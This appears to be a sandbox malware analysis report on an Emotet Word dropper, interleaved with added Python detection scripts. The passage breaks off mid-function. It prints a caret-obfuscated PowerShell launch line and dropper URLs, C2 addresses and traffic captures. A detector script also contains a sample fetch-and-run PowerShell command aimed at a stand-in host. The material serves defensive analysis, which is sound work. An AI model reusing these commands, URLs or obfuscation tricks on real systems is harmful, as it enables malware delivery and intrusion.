Analysis Report Arch_2021_717-1562532.doc

Overview

General Information

Sample Name: Arch_2021_717-1562532.doc
Analysis ID: 344339
MD5: d8358bce25bf7488068cfa9490205833
SHA1: 35c09dac297f82402a99de172600ba40d87c3ab7
SHA256: b253cf724dd411f9a433e2595d82ee412c28ae67c09ea0538d382334f2684f10

Detection

Emotet
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
System process connects to network (likely due to code injection or exploit)
Yara detected Emotet
Creates processes via WMI
Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Encrypted powershell cmdline option found
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
Obfuscated command line found
Potential dropper URLs found in powershell memory
Powershell drops PE file
Sigma detected: Suspicious Call by Ordinal
Sigma detected: Suspicious Encoded PowerShell Command Line
Suspicious powershell command line found
Very long command line found
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Downloads executable code via HTTP
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Startup

  • System is w7x64
  • WINWORD.EXE (PID: 2448 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
  • cmd.exe (PID: 1100 cmdline: cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc 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 MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
    • msg.exe (PID: 1664 cmdline: msg user /v Word experienced an error trying to open the file. MD5: 2214979661E779C3E3C33D4F14E6F3AC)
    • powershell.exe (PID: 2564 cmdline: powershell -w hidden -enc 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 MD5: 852D67A27E454BD389FA7F02A8CBE23F)
      • rundll32.exe (PID: 2736 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kaktksw\An6othh\N49I.dll AnyString MD5: DD81D91FF3B0763C392422865C9AC12E)
        • rundll32.exe (PID: 2764 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kaktksw\An6othh\N49I.dll AnyString MD5: 51138BEEA3E2C21EC44D0932C71762A8)
          • rundll32.exe (PID: 2484 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Kaktksw\An6othh\N49I.dll',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
            • rundll32.exe (PID: 2852 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Kvmkgtcj\aykivov.nhj',HGTGPppTjVNX MD5: 51138BEEA3E2C21EC44D0932C71762A8)
              • rundll32.exe (PID: 2856 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Kvmkgtcj\aykivov.nhj',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                • rundll32.exe (PID: 2964 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Unxqf\ouoi.jab',tPlaqqOeWpG MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                  • rundll32.exe (PID: 2968 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Unxqf\ouoi.jab',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                    • rundll32.exe (PID: 2836 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Iemuqepepuxnfb\fiqpbnltnychm.qgs',SlGUqAwWB MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                      • rundll32.exe (PID: 2464 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Iemuqepepuxnfb\fiqpbnltnychm.qgs',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                        • rundll32.exe (PID: 2128 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qzwbjgb\bmqjkk.hhh',AkVsWQgzjbvUf MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                          • rundll32.exe (PID: 3056 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qzwbjgb\bmqjkk.hhh',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
  • cleanup
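
The tree above is the chain the report's Sigma hits and command-line signatures are derived from: a cmd.exe line padded with caret (^) escapes so that the words msg and powershell never appear contiguously, a PowerShell stage started with -enc, rundll32 first loading the dropped DLL by export name, then by ordinal (#1), then re-executing copies with non-.dll extensions out of C:\Windows\SysWOW64. The script below is an added example and not part of the report or of any Joe Sandbox or Sigma code: it reproduces those detections over constructed process-creation events copied from the tree. Caret normalisation follows cmd.exe's rule that ^ escapes the character after it. The -enc payload is not present in the report, so a constructed one stands in for it; the "module loaded from user profile" and "module without .dll extension" checks are heuristics added here, not the Sigma rules the report cites.

```python
import base64
import re

# Constructed stand-in for the -enc payload the report does not show.
FAKE_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x')"
FAKE_ENC = base64.b64encode(FAKE_SCRIPT.encode("utf-16-le")).decode()

# Process-creation events (pid, command line) copied from the report's Startup
# tree; PID 9999 is a constructed benign control.
EVENTS = [
    ("1100", r"cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc " + FAKE_ENC),
    ("2564", "powershell -w hidden -enc " + FAKE_ENC),
    ("2736", r"'C:\Windows\system32\rundll32.exe' C:\Users\user\Kaktksw\An6othh\N49I.dll AnyString"),
    ("2484", r"C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Kaktksw\An6othh\N49I.dll',#1"),
    ("2852", r"C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Kvmkgtcj\aykivov.nhj',HGTGPppTjVNX"),
    ("9999", r"C:\Windows\System32\rundll32.exe shell32.dll,Control_RunDLL"),
]

# -e / -ec / -en / -enc / -encodedcommand followed by a base64 blob.
ENC_RE = re.compile(r"(?i)\bpowershell(?:\.exe)?\b.*?\s-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{20,})")
# rundll32 invoking an export by ordinal: <module>,#<n>
ORDINAL_RE = re.compile(r"(?i)\brundll32(?:\.exe)?\b.*,#\d+")
# first argument after rundll32[.exe], with or without quotes, up to the comma
MODULE_RE = re.compile(r"(?i)\brundll32(?:\.exe)?['\"]?\s+['\"]?([^'\",\s]+)")


def normalize_cmd(cmd):
    """Undo cmd.exe caret escaping ('^x' -> 'x'); return (clean, carets_removed)."""
    clean = re.sub(r"\^(.)", r"\1", cmd)
    return clean, cmd.count("^") - clean.count("^")


def analyze(events):
    """Return (pid, finding) pairs for the command lines in events."""
    findings = []
    for pid, raw in events:
        cmd, carets = normalize_cmd(raw)
        if carets >= 3:  # heuristic threshold: legitimate lines rarely need several carets
            findings.append((pid, "Obfuscated command line (caret insertion)"))
        if ENC_RE.search(cmd):
            findings.append((pid, "Suspicious Encoded PowerShell Command Line"))
        if ORDINAL_RE.search(cmd):
            findings.append((pid, "Suspicious Call by Ordinal"))
        m = MODULE_RE.search(cmd)
        if m:
            module = m.group(1).lower()
            if not module.endswith(".dll"):          # heuristic added here
                findings.append((pid, "rundll32 module without .dll extension"))
            if module.startswith("c:\\users\\"):     # heuristic added here
                findings.append((pid, "rundll32 module loaded from user profile"))
    return findings


def decode_encoded_command(raw):
    """Strip carets, locate the -enc blob and decode it (PowerShell uses UTF-16LE)."""
    cmd, _ = normalize_cmd(raw)
    m = ENC_RE.search(cmd)
    if not m:
        return None
    return base64.b64decode(m.group(1)).decode("utf-16-le")


if __name__ == "__main__":
    for pid, finding in analyze(EVENTS):
        print(pid, finding)
    print(decode_encoded_command(EVENTS[0][1]))
```

Running the script lists the same hits the report shows for PIDs 1100, 2564 and 2484, and the decoded payload for PID 1100 shows why normalisation has to happen before the encoded-command check: the raw line contains neither "powershell" nor "-enc" as a contiguous string.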

Malware Configuration

Threatname: Emotet

{"RSA Public Key": "MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAOZ9fLJ8UrI0OZURpPsR3eijAyfPj3z6\nuS75f2igmYFW2aWgNcFIzsAYQleKzD0nlCFHOo7Zf8/4wY2UW0CJ4dJEHnE/PHlz\n6uNk3pxjm7o4eCDyiJbzf+k0Azjl0q54FQIDAQAB"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author
0000000B.00000002.2116581505.0000000000240000.00000040.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
0000000A.00000002.2113422714.00000000003F0000.00000040.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
0000000A.00000002.2113576039.0000000000780000.00000040.00020000.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
00000008.00000002.2108915228.0000000000260000.00000040.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
0000000C.00000002.2120708575.00000000002C0000.00000040.00020000.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
(the full report lists 25 entries; 5 shown here)

Unpacked PEs

Source | Rule | Description | Author
8.2.rundll32.exe.2a0000.0.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
13.2.rundll32.exe.220000.0.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
13.2.rundll32.exe.220000.0.raw.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
9.2.rundll32.exe.260000.0.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
7.2.rundll32.exe.1b0000.0.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
(the full report lists 35 entries; 5 shown here)

Sigma Overview

System Summary:

Sigma detected: Suspicious Call by Ordinal
Source: Process started. Author: Florian Roth. Data: Command: C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Kaktksw\An6othh\N49I.dll',#1, CommandLine: C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Kaktksw\An6othh\N49I.dll',#1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kaktksw\An6othh\N49I.dll AnyString, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 2764, ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Kaktksw\An6othh\N49I.dll',#1, ProcessId: 2484
Sigma detected: Suspicious Encoded PowerShell Command Line
Source: Process started. Author: Florian Roth, Markus Neis. Data: Command: powershell -w hidden -enc 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

Signature Overview

AV Detection:

Antivirus detection for URL or domain
Source: http://3musketeersent.net/wp-includes/TUgD/ | Avira URL Cloud: Label: malware
Source: http://dashudance.com/thinkphp/dgs7Jm9/ | Avira URL Cloud: Label: malware
Source: http://shannared.com/content/lhALeS/ | Avira URL Cloud: Label: malware
Source: http://mmrincs.com/eternal-duelist-9cuqv/jxGQj/ | Avira URL Cloud: Label: malware
Source: http://leopardcranes.com/zynq-linux-yaayf/w/ | Avira URL Cloud: Label: malware
Multi AV Scanner detection for dropped file
Source: C:\Users\user\Kaktksw\An6othh\N49I.dll | ReversingLabs: Detection: 54%
Multi AV Scanner detection for submitted file
Source: Arch_2021_717-1562532.doc | Virustotal: Detection: 16%
Source: Arch_2021_717-1562532.doc | ReversingLabs: Detection: 27%
Machine Learning detection for dropped file
Source: C:\Users\user\Kaktksw\An6othh\N49I.dll | Joe Sandbox ML: detected

Compliance:

Uses new MSVCR Dlls
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Binary contains paths to debug symbols
Source: Binary string: System.Management.Automation.pdb | source: powershell.exe, 00000005.00000002.2105592367.00000000029F7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom | source: powershell.exe, 00000005.00000002.2105592367.00000000029F7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbProg | source: powershell.exe, 00000005.00000002.2105592367.00000000029F7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb | source: powershell.exe, 00000005.00000002.2105592367.00000000029F7000.00000004.00000040.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP | source: powershell.exe, 00000005.00000002.2105592367.00000000029F7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb | source: powershell.exe, 00000005.00000002.2105592367.00000000029F7000.00000004.00000040.sdmp
Source: Binary string: mscorrc.pdb | source: powershell.exe, 00000005.00000002.2105632557.0000000002A50000.00000002.00000001.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: global traffic | DNS query: name: shannared.com
Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 192.169.223.13:80

Networking:

Potential dropper URLs found in powershell memory
Source: powershell.exe, 00000005.00000002.2109591896.000000000393A000.00000004.00000001.sdmp | String found in memory: http://shannared.com/content/lhALeS/!http://jeevanlic.com/wp-content/r8M/!http://dashudance.com/thinkphp/dgs7Jm9/!http://leopardcranes.com/zynq-linux-yaayf/w/!http://mmrincs.com/eternal-duelist-9cuqv/jxGQj/!http://3musketeersent.net/wp-includes/TUgD/!https://skilmu.com/wp-admin/hQVlB8b/
Source: global traffic | TCP traffic: 192.168.2.22:49169 -> 51.255.203.164:8080
Source: global traffic | TCP traffic: 192.168.2.22:49171 -> 217.160.169.110:8080
Source: global traffic | HTTP traffic detected:
HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Expires: Tue, 26 Jan 2021 12:33:15 GMT
Content-Disposition: attachment; filename="O9TGnKaUCw.dll"
Content-Transfer-Encoding: binary
Set-Cookie: 60100c0bb399f=1611664395; expires=Tue, 26-Jan-2021 12:34:15 GMT; Max-Age=60; path=/
Last-Modified: Tue, 26 Jan 2021 12:33:15 GMT
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Content-Type: application/octet-stream
X-Cacheable: YES:Forced
Content-Length: 631808
Accept-Ranges: bytes
Date: Tue, 26 Jan 2021 12:33:15 GMT
Age: 0
Vary: User-Agent
X-Cache: uncached
X-Cache-Hit: MISS
X-Backend: all_requests
Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8e a1 0b 01 02 19 00 30 06 00 00 70 03 00 00 00 00 00 bc 3e 06 00 00 10 00 00 00 40 06 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 09 00 00 04 00 00 00 00 00 00 02 00 01 00 00 00 00 00 00 00 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 ec 22 00 00 00 10 07 00 00 c6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 06 00 d4 6e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 4f 44 45 00 00 00 00 e8 2e 06 00 00 10 00 00 00 30 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 44 41 54 41 00 00 00 00 cc 14 00 00 00 40 06 00 00 16 00 00 00 34 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 42 53 53 00 00 00 00 00 d1 0c 00 00 00 60 06 00 00 00 00 00 00 4a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 ec 22 00 00 00 70 06 00 00 24 00 00 00 4a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 d4 6e 00 00 00 a0
Data Ascii: MZP@!L!This program must be run under Win32$7PEL^B*
Source: global traffic | HTTP traffic detected: GET /content/lhALeS/ HTTP/1.1 | Host: shannared.com | Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 84.232.229.24
Source: Joe Sandbox View | IP Address: 192.169.223.13
Source: Joe Sandbox View | ASN Name: ONEANDONE-ASBrauerstrasse48DE
Source: Joe Sandbox View | ASN Name: OVHFR
Source: Joe Sandbox View | ASN Name: RCS-RDS73-75DrStaicoviciRO
Source: global traffic | HTTP traffic detected: POST /zrm2/7son14/mlqmfbi2uji6/ HTTP/1.1 | DNT: 0 | Referer: 217.160.169.110/zrm2/7son14/mlqmfbi2uji6/ | Content-Type: multipart/form-data; boundary=--------orf6DU5u | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: 217.160.169.110:8080 | Content-Length: 5748 | Connection: Keep-Alive | Cache-Control: no-cache
Source: unknown | TCP traffic detected without corresponding DNS query: 84.232.229.24 (reported 3 times)
Source: unknown | TCP traffic detected without corresponding DNS query: 51.255.203.164 (reported 6 times)
Source: unknown | TCP traffic detected without corresponding DNS query: 217.160.169.110 (reported 8 times)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{B6528223-1CF8-4E74-AA78-05F4F57053A0}.tmp
Source: global traffic | HTTP traffic detected: GET /content/lhALeS/ HTTP/1.1 | Host: shannared.com | Connection: Keep-Alive
Source: rundll32.exe, 00000006.00000002.2109332394.0000000001B50000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2108251101.0000000002300000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2109282110.0000000001F40000.00000002.00000001.sdmp | String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: unknown | DNS traffic detected: queries for: shannared.com
Source: unknown | HTTP traffic detected: POST /zrm2/7son14/mlqmfbi2uji6/ HTTP/1.1 | DNT: 0 | Referer: 217.160.169.110/zrm2/7son14/mlqmfbi2uji6/ | Content-Type: multipart/form-data; boundary=--------orf6DU5u | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: 217.160.169.110:8080 | Content-Length: 5748 | Connection: Keep-Alive | Cache-Control: no-cache
Source: powershell.exe, 00000005.00000002.2109591896.000000000393A000.00000004.00000001.sdmp | String found in binary or memory: http://3musketeersent.net/wp-includes/TUgD/
Source: powershell.exe, 00000005.00000002.2109591896.000000000393A000.00000004.00000001.sdmp | String found in binary or memory: http://dashudance.com/thinkphp/dgs7Jm9/
Source: rundll32.exe, 00000006.00000002.2109332394.0000000001B50000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2108251101.0000000002300000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2109282110.0000000001F40000.00000002.00000001.sdmp | String found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000006.00000002.2109332394.0000000001B50000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2108251101.0000000002300000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2109282110.0000000001F40000.00000002.00000001.sdmp | String found in binary or memory: http://investor.msn.com/
Source: powershell.exe, 00000005.00000002.2109591896.000000000393A000.00000004.00000001.sdmp | String found in binary or memory: http://jeevanlic.com/wp-content/r8M/
Source: powershell.exe, 00000005.00000002.2109591896.000000000393A000.00000004.00000001.sdmp | String found in binary or memory: http://leopardcranes.com/zynq-linux-yaayf/w/
Source: rundll32.exe, 00000006.00000002.2109664973.0000000001D37000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2108487804.00000000024E7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2109570397.0000000002127000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2112777932.0000000002127000.00000002.00000001.sdmp | String found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000006.00000002.2109664973.0000000001D37000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2108487804.00000000024E7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2109570397.0000000002127000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2112777932.0000000002127000.00000002.00000001.sdmp | String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: powershell.exe, 00000005.00000002.2109591896.000000000393A000.00000004.00000001.sdmp | String found in binary or memory: http://mmrincs.com/eternal-duelist-9cuqv/jxGQj/
Source: powershell.exe, 00000005.00000002.2105195514.0000000002210000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2112633522.0000000002980000.00000002.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: rundll32.exe, 00000006.00000002.2109664973.0000000001D37000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2108487804.00000000024E7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2109570397.0000000002127000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2112777932.0000000002127000.00000002.00000001.sdmp | String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: powershell.exe, 00000005.00000002.2109838810.0000000003A46000.00000004.00000001.sdmp | String found in binary or memory: http://shannared.com
Source: powershell.exe, 00000005.00000002.2109591896.000000000393A000.00000004.00000001.sdmp | String found in binary or memory: http://shannared.com/content/lhALeS/
Source: rundll32.exe, 00000006.00000002.2109664973.0000000001D37000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2108487804.00000000024E7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2109570397.0000000002127000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2112777932.0000000002127000.00000002.00000001.sdmp | String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: powershell.exe, 00000005.00000002.2105195514.0000000002210000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2112633522.0000000002980000.00000002.00000001.sdmp | String found in binary or memory: http://www.%s.comPA
Source: rundll32.exe, 00000006.00000002.2109332394.0000000001B50000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2108251101.0000000002300000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2109282110.0000000001F40000.00000002.00000001.sdmp | String found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000006.00000002.2109664973.0000000001D37000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2108487804.00000000024E7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2109570397.0000000002127000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2112777932.0000000002127000.00000002.00000001.sdmp | String found in binary or memory: http://www.icra.org/vocabulary/.
Source: rundll32.exe, 00000006.00000002.2109332394.0000000001B50000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2108251101.0000000002300000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2109282110.0000000001F40000.00000002.00000001.sdmp | String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: powershell.exe, 00000005.00000002.2104262504.0000000000134000.00000004.00000020.sdmp | String found in binary or memory: http://www.piriform.com/ccleaner
Source: powershell.exe, 00000005.00000002.2104262504.0000000000134000.00000004.00000020.sdmp | String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: rundll32.exe, 00000009.00000002.2112546062.0000000001F40000.00000002.00000001.sdmp | String found in binary or memory: http://www.windows.com/pctv.
Source: powershell.exe, 00000005.00000002.2109591896.000000000393A000.00000004.00000001.sdmp | String found in binary or memory: https://skilmu.com/wp-admin/hQVlB8b/
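
The 200 OK captured in this section is the dropper fetch behind the "Downloads executable code via HTTP" signature: the server sends Content-Disposition: attachment; filename="O9TGnKaUCw.dll", Content-Type: application/octet-stream, and a body starting 4d 5a 50 00 ("MZP"), with the PE header at offset 0x100 declaring Machine 0x014c, TimeDateStamp 0x2a425e19, SizeOfOptionalHeader 0xe0, Characteristics 0xa18e and sections named CODE, DATA, BSS, .idata and .reloc. The "MZP" stub, those section names and the 0x2A425E19 timestamp (19 June 1992) are the marks of a Delphi-built binary, and 0xa18e has IMAGE_FILE_DLL set, which matches the rundll32 loading seen in the process tree. The script below is an added example, not part of the report or of Joe Sandbox: it checks a response body for a PE image by walking the DOS and COFF headers rather than trusting the headers, and runs on a constructed body that mirrors the fields visible in the dump. The constructed sample declares 5 sections, the number of names visible in the dump, while the real file declares 6.

```python
import struct
from datetime import datetime, timezone

IMAGE_FILE_DLL = 0x2000
DELPHI_TIMESTAMP = 0x2A425E19          # fixed link time carried by Delphi-built PEs
MACHINES = {0x14C: "i386", 0x8664: "x86-64"}


def inspect_pe(body):
    """Return header facts if body starts with a PE image, else None."""
    if len(body) < 0x40 or body[:2] != b"MZ":
        return None
    (e_lfanew,) = struct.unpack_from("<I", body, 0x3C)      # offset of "PE\0\0"
    if e_lfanew + 24 > len(body) or body[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    # COFF file header: Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    machine, nsect, stamp, _, _, opt_size, chars = struct.unpack_from("<HHIIIHH", body, e_lfanew + 4)
    names = []
    base = e_lfanew + 24 + opt_size                          # section table follows the optional header
    for i in range(nsect):
        off = base + 40 * i                                  # IMAGE_SECTION_HEADER is 40 bytes, name first
        if off + 40 > len(body):
            break
        names.append(body[off:off + 8].rstrip(b"\0").decode("ascii", "replace"))
    return {
        "machine": MACHINES.get(machine, hex(machine)),
        "is_dll": bool(chars & IMAGE_FILE_DLL),
        "sections": names,
        "link_time": datetime.fromtimestamp(stamp, timezone.utc).isoformat(),
        "delphi_timestamp": stamp == DELPHI_TIMESTAMP,
    }


def triage_response(headers, body):
    """Flag a response that delivers a PE, whatever the headers claim; None if not a PE."""
    pe = inspect_pe(body)
    if pe is None:
        return None
    disp = headers.get("Content-Disposition", "")
    filename = disp.split('filename="')[-1].rstrip('"') if 'filename="' in disp else None
    return {**pe, "filename": filename, "content_type": headers.get("Content-Type")}


def build_sample():
    """Constructed body reproducing the header fields visible in the report's dump."""
    dos = bytearray(0x100)
    dos[:4] = b"MZP\0"                                       # Delphi-style DOS stub signature
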